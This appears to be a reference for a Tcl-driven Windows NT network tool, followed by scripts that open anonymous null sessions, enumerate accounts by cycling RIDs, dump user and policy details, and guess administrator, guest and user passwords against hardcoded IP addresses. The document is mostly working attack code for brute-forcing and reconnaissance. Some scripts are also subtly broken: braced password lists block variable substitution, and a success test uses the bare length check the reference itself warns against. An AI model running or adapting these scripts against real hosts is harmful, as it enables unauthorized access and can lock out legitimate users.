-----------------------------------------------------------------------
# Commands

NBTStatus
  args   - IP addr of target machine
           IP addr of local interface
  output - NetBIOS name table on success
           error string on failure

NTCreateAnonymousConn
  args   - name or IP addr of target machine
  output - empty set on success
           error string on failure

NTLogon
  args   - target machine name or IP addr
           username
           comma-delimited list of passwords to try
  output - set containing password, username, and privilege level on success
           set containing one string, NOT_IN_LIST, on failure
  (note: every entry in the password list is a real logon attempt against the
   target and counts toward its account-lockout threshold)

NTDeleteConn
  args   - target machine name or IP addr
  output - string "Deleted" on success
           error string on failure

NTEnumUsers
  args   - name or IP addr of target machine
  output - set containing usernames
           error string on failure

NTEnumGlobalGroups
  args   - name or IP addr of target machine
  output - set containing global group names
           error string on failure

NTEnumLocalGroups
  args   - name or IP addr of target machine
  output - set containing local group names
           error string on failure

NTLookupAccountSID
  args   - name of machine (NULL for local machine)
           user RID
  output - string containing domain and username in DOMAIN\USERNAME format on success
           error string on failure
  (note: because the failure case is also a non-empty string, callers must not
   test success with a bare length check)

NTUserGetInfo
  args   - name or IP addr of the target machine
           username for the target account
  output - set containing username, password age, privilege level, comment,
           user flags, logon script path, auth flags, full name, and account
           parameters on success
           error string on failure

NTGetPasswordPolicy
  args   - name or IP addr of target machine
  output - password policy parameters

NTGetMachineRole
  (args/output not documented on this page; the scripts below call it with the
   target name or IP addr and print the result)

NTGetLockoutPolicy
  args   - name or IP addr of target machine
  output - lockout policy parameters

NTGetSAMDomain
  args   - name or IP addr of target machine
  output - name of domain associated with the SAM of the machine (will be the
           machine name on everything but domain controllers)
           SID for the domain

NTSetRegValue
  args   - name or IP addr of target machine
           registry key (must be a subkey of
HKEY_LOCAL_MACHINE) registry value to set (format- ::) output - string confirming value name and data on success error string on failure NTQueryServiceConfig args - name or IP addr of target machine name of service output - set containing the service display name, path to binary, start type, and user account the service is starting under NTEnumServices args - name or IP addr of target machine output - set containing the names of all the running services on success error string on failure ----------------------------------------------------------------------- # Account Brute Password set target "172.17.67.64" puts $target # lookup up to the first 2000 user accounts for {set x 1000} {$x<3000} {incr x} { NTCreateAnonymousConn $target set name [NTLookupAccountSID $target $x] if {[string length $name]} { NTDeleteConn $target set password [NTLogon $target $name {$name,password}] if {[string first "NOT_IN_LIST" $password]!=-1} { puts "Could not guess account $name password" } else { puts "Account $name has password: $password" } } NTDeleteConn $target } return ----------------------------------------------------------------------- # Infosweep for {set i 64} {$i<65} {incr i} { # replace the netID in the target string with the appropriate value set target "172.17.67.$i" puts $target # replace the loopback addr with the IP of the interface being used to reach the target set nstatus [NBTStatus $target {172.17.67.17}] puts $nstatus # create Anonymous connection to the target host, if fails continue to next IP if {[string first "ERROR" [NTCreateAnonymousConn $target]]!=-1} {continue} # get the password policy puts "Password policy parameters:" set policy [NTGetPasswordPolicy $target] puts $policy # get the account lockout params puts "Account lockout parameters:" set lockout [NTGetLockoutPolicy $target] puts $lockout # get the domain associated with the target machine's SAM set domain [NTGetSAMDomain $target] # get the machine role puts "Machine role:" set role 
[NTGetMachineRole $target] puts $role puts $domain puts "Users defined locally:" set users [NTEnumUsers $target] puts $users puts "Local groups:" set localgrp [NTEnumLocalGroups $target] puts $localgrp puts "Global groups:" set globalgrp [NTEnumGlobalGroups $target] puts $globalgrp # get and save name of administrator account for later use set admin [NTLookupAccountSID $target {500}] # delete the Anonymous connection NTDeleteConn $target # try admin account with "administrator" and blank passwords set password [NTLogon $target $admin {administrator,$admin,$domain,password,root}] if {[string first "NOT_IN_LIST" $password]!=-1} { puts "Could not guess admin password - trying guest account" # attempt to logon as Guest with no password and password "guest" if admin didn't work set guest [NTLogon $target {guest} {guest,$domain}] puts $guest } else { puts "Account $admin (administrator) has password $password" } } return ----------------------------------------------------------------------- # GET USER INFO set target "192.168.0.2" puts $target # create Anonymous connection to the target host NTCreateAnonymousConn $target # lookup names for the Administrator and Guest accounts for {set x 500} {$x<502} {incr x} { set name [NTLookupAccountSID $target $x] if {[string length $name]} { set info [NTUserGetInfo $target $name] puts $info } } # lookup up to the first 2000 user accounts for {set x 1000} {$x<3000} {incr x} { set name [NTLookupAccountSID $target $x] if {[string length $name]} { set info [NTUserGetInfo $target $name] puts $info } } NTDeleteConn $target return